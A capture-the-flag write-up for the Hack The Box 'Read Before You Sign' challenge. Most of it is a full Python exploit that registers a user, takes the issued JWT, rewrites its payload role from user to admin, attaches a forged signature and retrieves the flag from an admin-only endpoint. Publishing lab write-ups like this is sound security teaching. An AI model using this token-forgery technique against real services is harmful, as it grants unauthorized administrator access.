Post

HackTheBox Read Before You Sign Writeup

Posted
By x3ric
2 min read

Explore the basics of cybersecurity in the Read Before You Sign Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/789

Description

E Corp’s control hinges on their ability to manipulate and monitor the population. A crucial system has been infiltrated, and it contains vital information about the EverLast chemical. As a member of the immune group, your mission is to gain administrator privileges within the system and access confidential secrets. The system’s defenses appear robust, but we believe there’s a vulnerability waiting to be exploited due to their outdated infrastructure. Discover the hidden truths and help us dismantle their control over society. The future of our freedom rests in your hands.

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

import re
import sys
import requests
from base64 import b64encode, b64decode

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    return f"http://{sys.argv[1]}/"

URL = get_base_url()

def craft_admin_token(jwt):
    header, payload, _ = jwt.split('.')
    new_payload = b64encode(b64decode(payload.encode()).replace(b'user', b'admin')).decode()
    return f"{header}.{new_payload}.MAYCAQACAQA"

def jwt_user():
    headers = {
        "Host": sys.argv[1],
        "Content-Type": "application/x-www-form-urlencoded"
    }
    requests.post(f'{URL}/register', headers=headers, data="username=htb_user&password=htb_user&email=user@htb.eu")
    response = requests.post(f'{URL}/login', headers=headers, data="username=htb_user&password=htb_user")
    if response.status_code != 200:
        print(f"Error during login: {response.text}")
        sys.exit(1)
    token = response.cookies.get('token')
    if not token:
        print("Error: JWT token not found in cookies")
        sys.exit(1)
    return token

def send_admin_token(token):
    response = requests.get(f'{URL}/list', cookies={'token': token})
    match = re.search(r'HTB\{.*?\}', response.text)
    return match.group(0) if match else "Flag not found"

if __name__ == '__main__':
    admin_token = craft_admin_token(jwt_user())
    flag = send_admin_token(admin_token)
    print(flag)

Summary

Read Before You Sign Challenge on Hack The Box involves exploiting JSON Web Token (JWT) manipulation to escalate privileges. In this challenge, the PoC registers a standard user, obtains their JWT, then modifies the token’s payload from user to admin by base64-decoding and editing it. The crafted admin token allows unauthorized access to retrieve the flag from an endpoint restricted to admin users. This challenge demonstrates weaknesses in JWT handling and highlights the risks of inadequate token validation.

challenge
htb challenge writeup linux crypto
This post is licensed under CC BY 4.0 by the author.